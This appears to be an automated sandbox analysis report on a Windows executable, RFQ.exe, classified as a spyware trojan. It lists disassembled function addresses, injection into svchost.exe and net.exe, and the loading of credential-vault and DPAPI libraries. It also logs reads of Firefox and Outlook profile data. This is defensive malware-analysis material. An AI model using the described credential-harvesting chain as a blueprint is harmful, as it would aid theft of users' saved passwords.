                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FAB401_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F6BD71_2_031F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA801_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031569621_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320A9A61_2_0320A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A01_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314A8401_2_0314A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031428401_2_03142840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031268B81_2_031268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E8F01_2_0316E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160F301_2_03160F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E2F301_2_031E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03182F281_2_03182F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4F401_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BEFA01_2_031BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132FC81_2_03132FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEE261_2_031FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140E591_2_03140E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152E901_2_03152E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FCE931_2_031FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEEDB1_2_031FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DCD1F1_2_031DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314AD001_2_0314AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03158DBF1_2_03158DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313ADE01_2_0313ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140C001_2_03140C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0CB51_2_031E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130CF21_2_03130CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F132D1_2_031F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D34C1_2_0312D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0318739A1_2_0318739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A01_2_031452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C01_2_0315B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D2F01_2_0315D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED1_2_031E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B16B1_2_0320B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F1721_2_0312F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317516C1_2_0317516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314B1B01_2_0314B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF0CC1_2_031EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C01_2_031470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F70E91_2_031F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF0E01_2_031FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF7B01_2_031FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031856301_2_03185630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F16CC1_2_031F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F75711_2_031F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DD5B01_2_031DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032095C31_2_032095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF43F1_2_031FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031314601_2_03131460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFB761_2_031FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FB801_2_0315FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B5BF01_2_031B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317DBF91_2_0317DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFA491_2_031FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7A461_2_031F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B3A6C1_2_031B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DDAAC1_2_031DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03185AA01_2_03185AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E1AA31_2_031E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EDAC61_2_031EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D59101_2_031D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031499501_2_03149950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B9501_2_0315B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD8001_2_031AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031438E01_2_031438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFF091_2_031FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141F921_2_03141F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFFB11_2_031FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03103FD21_2_03103FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03103FD51_2_03103FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03149EB01_2_03149EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F1D5A1_2_031F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143D401_2_03143D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7D731_2_031F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FDC01_2_0315FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B9C321_2_031B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFCF21_2_031FFCF2
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0335FB882_2_0335FB88
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_03361B652_2_03361B65
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0335FBF42_2_0335FBF4
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_0335FBE52_2_0335FBE5
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_033682C52_2_033682C5
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_033682C02_2_033682C0
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_033619452_2_03361945
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeCode function: 2_2_033806C52_2_033806C5
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356A3523_2_0356A352
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035703E63_2_035703E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034BE3F03_2_034BE3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035502743_2_03550274
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035302C03_2_035302C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035381583_2_03538158
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034A01003_2_034A0100
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0354A1183_2_0354A118
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035681CC3_2_035681CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035641A23_2_035641A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035701AA3_2_035701AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035420003_2_03542000
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034D47503_2_034D4750
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B07703_2_034B0770
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034AC7C03_2_034AC7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034CC6E03_2_034CC6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B05353_2_034B0535
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035705913_2_03570591
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035624463_2_03562446
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035544203_2_03554420
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0355E4F63_2_0355E4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356AB403_2_0356AB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03566BD73_2_03566BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034AEA803_2_034AEA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034C69623_2_034C6962
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B29A03_2_034B29A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0357A9A63_2_0357A9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034BA8403_2_034BA840
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B28403_2_034B2840
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034DE8F03_2_034DE8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034968B83_2_034968B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03524F403_2_03524F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03552F303_2_03552F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034F2F283_2_034F2F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034D0F303_2_034D0F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034A2FC83_2_034A2FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0352EFA03_2_0352EFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B0E593_2_034B0E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356EE263_2_0356EE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356EEDB3_2_0356EEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356CE933_2_0356CE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034C2E903_2_034C2E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034BAD003_2_034BAD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0354CD1F3_2_0354CD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034AADE03_2_034AADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034C8DBF3_2_034C8DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B0C003_2_034B0C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034A0CF23_2_034A0CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03550CB53_2_03550CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0349D34C3_2_0349D34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356132D3_2_0356132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034F739A3_2_034F739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034CB2C03_2_034CB2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035512ED3_2_035512ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034CD2F03_2_034CD2F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B52A03_2_034B52A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034E516C3_2_034E516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0349F1723_2_0349F172
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0357B16B3_2_0357B16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034BB1B03_2_034BB1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B70C03_2_034B70C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0355F0CC3_2_0355F0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356F0E03_2_0356F0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035670E93_2_035670E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356F7B03_2_0356F7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034F56303_2_034F5630
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035616CC3_2_035616CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035675713_2_03567571
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035795C33_2_035795C3
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0354D5B03_2_0354D5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034A14603_2_034A1460
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356F43F3_2_0356F43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356FB763_2_0356FB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03525BF03_2_03525BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034EDBF93_2_034EDBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034CFB803_2_034CFB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03567A463_2_03567A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356FA493_2_0356FA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03523A6C3_2_03523A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0355DAC63_2_0355DAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034F5AA03_2_034F5AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03551AA33_2_03551AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0354DAAC3_2_0354DAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B99503_2_034B9950
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034CB9503_2_034CB950
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_035459103_2_03545910
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0351D8003_2_0351D800
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B38E03_2_034B38E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356FF093_2_0356FF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03473FD53_2_03473FD5
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03473FD23_2_03473FD2
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B1F923_2_034B1F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356FFB13_2_0356FFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B9EB03_2_034B9EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034B3D403_2_034B3D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03561D5A3_2_03561D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03567D733_2_03567D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_034CFDC03_2_034CFDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_03529C323_2_03529C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0356FCF23_2_0356FCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B01F803_2_00B01F80
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00AFCEA03_2_00AFCEA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00AFD0C03_2_00AFD0C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00AFB1403_2_00AFB140
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B055E03_2_00B055E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B038203_2_00B03820
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B0381B3_2_00B0381B
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_00B1BC203_2_00B1BC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0320E3043_2_0320E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_032152243_2_03215224
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0320E1E43_2_0320E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0320D7683_2_0320D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 3_2_0320E46C3_2_0320E46C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 0068B606 appears 31 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 006A48F3 appears 49 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 006A09B0 appears 46 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 00683536 appears 31 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0349B970 appears 262 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0351EA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 034E5130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 034F7E54 appears 107 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0352F290 appears 103 times
                Source: RFQ.exe, 00000000.00000003.1671543209.000000000426D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe, 00000000.00000003.1671016595.00000000040C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@12/8
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F36D3 GetLastError,FormatMessageW,0_2_006F36D3
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E1003 AdjustTokenPrivileges,CloseHandle,0_2_006E1003
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006E1607 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006E1607
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F50EB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006F50EB
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0070A5A3 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0070A5A3
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_006F63AC _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_006F63AC
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00686122 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00686122
                Source: C:\Users\user\Desktop\RFQ.exeFile created: C:\Users\user\AppData\Local\Temp\unbarricadoedJump to behavior
                Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 00000003.00000002.3506249546.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000003.1996466077.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000EA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ.exeReversingLabs: Detection: 62%
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ.exeStatic file information: File size 1604608 > 1048576
